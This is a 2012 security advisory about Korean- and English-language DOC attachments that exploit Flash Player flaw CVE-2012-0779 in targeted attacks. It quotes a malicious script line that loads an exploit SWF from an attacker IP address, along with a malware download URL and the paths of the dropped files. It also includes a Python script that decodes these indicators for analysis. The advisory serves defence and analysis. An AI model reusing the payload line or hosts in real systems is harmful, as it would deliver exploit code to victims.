
6/04/2012

[Warning] Malicious files for APT attacks using the CVE-2012-0779 exploit


1. Introduction

The INCA Internet Response Team has detected attacks using the latest Adobe Flash Player exploit (CVE-2012-0779); in particular, we found malicious DOC files carrying it. For this reason, users need to keep Adobe Flash Player updated to the latest version to stay safe from this threat, and should be careful when downloading attachments from suspicious e-mails.



2. Cases of CVE-2012-0779

Various malicious files using the CVE-2012-0779 exploit have been found. The following figure shows the malicious DOC files.



■ Malicious e-mail on April 13, 2012

This DOC file uses the CVE-2012-0779 exploit and is written in Korean, so we can assume it was intended for APT attacks in Korea.

The file name is "유통관련자료_수정본.doc". The run screen is as follows.


This malicious DOC file contains script code that makes the user's PC access a certain URL, where the malicious "exp.swf" had already been placed. At the time of writing, this malicious SWF has been removed from that location.

[download]
http://(~~)tkorea.com/uploadfiles/upload/exp.swf


This malicious file contains a malicious EXE (XOR-encoded).
Besides this file, various malicious files written in English were also found.


■ Malicious e-mail on May 03, 2012


"WUC Invitation Letter Guests.doc" contains the CVE-2012-0779 exploit. The following figure is its run screen.


The DOC file includes the following script code, which loads a malicious SWF file.

eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000%3E%3C/embed%3E')))
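As an added example (not part of the original post), the following Python script decodes the script line above to recover the indicators an analyst would record from it: it reproduces what JavaScript's unescape() yields, pulls the SWF URL out of the resulting <embed> tag, and decompresses the `info` query parameter, whose hex bytes start with 78 9c, the usual zlib header. Decompressing it gives a host:port string containing the same IP as the SWF URL; the post does not describe what the SWF does with that value, so the script only reports it. The regular expressions and the `analyze()` helper are our own assumptions fitted to this one sample, not a general parser.

```python
import re
import zlib
from urllib.parse import parse_qs, unquote, urlparse

# The script line exactly as quoted in the post (the only input this needs).
DOC_SCRIPT = (
    "eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/"
    "essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338"
    "&infosize=00FC0000%3E%3C/embed%3E')))"
)


def extract_unescape_payload(script: str) -> str:
    """Return the string that JavaScript's unescape() would produce.

    unescape() decodes %XX sequences; urllib's unquote does the same for
    the sequences used in this sample.
    """
    m = re.search(r"unescape\('([^']*)'\)", script)
    if not m:
        raise ValueError("no unescape() payload found")
    return unquote(m.group(1))


def extract_embed_src(html: str) -> str:
    """Pull the (unquoted) src attribute out of the <embed> tag."""
    m = re.search(r"<embed\s+src=([^\s>]+)", html)
    if not m:
        raise ValueError("no <embed src=...> found")
    return m.group(1)


def decode_info(info_hex: str) -> str:
    """Treat the info parameter as hex-encoded zlib data and decompress it.

    Raises ValueError for bad hex and zlib.error if the bytes are not a
    valid zlib stream (the header and checksum are both verified by zlib).
    """
    raw = bytes.fromhex(info_hex)
    return zlib.decompress(raw).decode("ascii")


def analyze(script: str) -> dict:
    """Extract network indicators from the DOC script line."""
    html = extract_unescape_payload(script)
    src = extract_embed_src(html)
    url = urlparse(src)
    qs = parse_qs(url.query)
    info_hex = qs.get("info", [""])[0]
    result = {
        "embed_html": html,
        "swf_url": src,
        "host": url.hostname,
        "swf_path": url.path,
        "info_hex": info_hex,
        "infosize": qs.get("infosize", [""])[0],
        "info_decoded": None,
    }
    try:
        result["info_decoded"] = decode_info(info_hex)
    except (ValueError, zlib.error):
        pass  # leave info_decoded as None if it is not a zlib stream
    return result


if __name__ == "__main__":
    for key, value in analyze(DOC_SCRIPT).items():
        print(f"{key:13}: {value}")
```

Running it prints the decoded <embed> tag, the host 204.45.73.69, the path /essais.swf, and the decompressed `info` value. The `infosize` parameter is reported as-is because the post gives no basis for interpreting it.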


After the malicious file is downloaded, the following files are executed in turn.

a. C:\Documents and Settings\[user account]\Application Data\Macromedia\Flash Player\#SharedObjects\temp.exe

b. C:\Documents and Settings\[user account]\Application Data\Macromedia\Flash Player\#SharedObjects\Flash_ActiveX.exe

c. C:\Documents and Settings\[user account]\Application Data\conime.exe

3. Summary

Adobe Flash Player 11.2.202.235, the official version, is now being distributed. To be safe from the CVE-2012-0779 exploit, users need to keep it updated to the latest version.

[Download]
http://get.adobe.com/kr/flashplayer/


To keep your PC safe from the security threats of such malicious attachments, we recommend downloading the latest security updates and following the "Security management tips" below for general users.

Security management tips

1. Keep the OS and applications at the latest security update level.
2. Use anti-virus software from a trustworthy security company, keep its engine updated, and keep the real-time detection function ON.
3. Do not open or download attachments from suspicious e-mails.
4. Be cautious of links sent via instant messengers and SNS.

INCA Internet (Security Response Center / Emergency Response Team) operates a response system against various security threats.
